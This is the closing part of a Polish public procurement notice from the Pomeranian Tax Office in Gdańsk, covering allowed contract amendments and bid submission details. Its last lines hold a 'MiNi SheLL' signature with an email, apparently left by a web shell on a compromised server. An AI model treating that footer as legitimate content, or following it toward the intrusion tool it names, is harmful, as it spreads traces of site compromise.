4.	Dopuszczalne są zmiany postanowień umowy:
1)	dotyczące zmian inspektorów nadzoru i kierowników (budowy, robót) w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych,
b)	nie wywiązywanie się z obowiązków wynikających z przepisów prawa,
c)	jeżeli zmiana inspektora nadzoru/ kierownika stanie się konieczna z jakiejkolwiek innych przyczyn niezależnych od Zamawiającego - Wykonawcy (np. rezygnacja, rozwiązanie stosunku pracy itp.),
d)	Zamawiający może zażądać od Wykonawcy zmiany kierownika, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z przepisów prawa, w terminie wskazanym przez Zamawiającego,
2) dotyczące nazwy, siedziby firmy, konta bankowego Wykonawcy lub Zamawiającego (zmian podmiotowych),
3)	dotyczące spowodowane zmian przepisów ustaw wymienionych w Umowie, a w szczególności ustawy Prawo Budowlane, Prawo zamówień publicznych,
4)	dotyczące wprowadzenie lub zmiany Podwykonawcy robót, w następujących przypadkach:
a)	śmierci, choroby (w przypadku osób fizycznych) lub innych zdarzeń losowych,
b)	nie wywiązanie się z obowiązków wynikających z przepisów,
c)	jeżeli zmiana Podwykonawcy stanie się konieczna z jakiejkolwiek innych przyczyn niezależnych od Zamawiającego - Wykonawcy (np. rezygnacja),
5)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
6)	dotyczące przedłużenia terminu realizacji umowy w przypadku, gdy wystąpi konieczność wykonania robót dodatkowych zgodnie z art. 67 ust. 1 pkt 5 ustawy Pzp opóźniających lub wstrzymujących realizację robót zasadniczych,
7)	z powodu okoliczności siły wyższej, w szczególności zagrażającej bezpośrednio życiu lub zdrowiu ludzi lub grożącej powstaniem szkody w znaczących rozmiarach,
8)	opóźnienia wynikające z nieplanowanych inspekcji organów kontrolnych skutkujących wstrzymaniem robót, które to działania nie są konsekwencją winy, którejkolwiek ze stron umowy,
9)	zmiana podmiotu, który zobowiązał się do oddania Wykonawcy do dyspozycji niezbędnych zasobów w celu realizacji niniejszego zamówienia, pod warunkiem, że Wykonawca przedstawi zobowiązanie nowego podmiotu przed upływem ważności poprzedniego zobowiązania,
Strona występująca o zmianę postanowień Umowy zobowiązana jest do udokumentowania zaistnienia okoliczności uzasadniających tę zmianę. Wniosek o zmianę postanowień Umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorski Urząd Skarbowy w Gdańsku ul. Żytnia 4/6, 80-749 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Pomorskiego Urzędu Skarbowego w Gdańsku w Gdańsku przy Żytniej 4/6 w kancelarii Urzędu pok. 1.22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com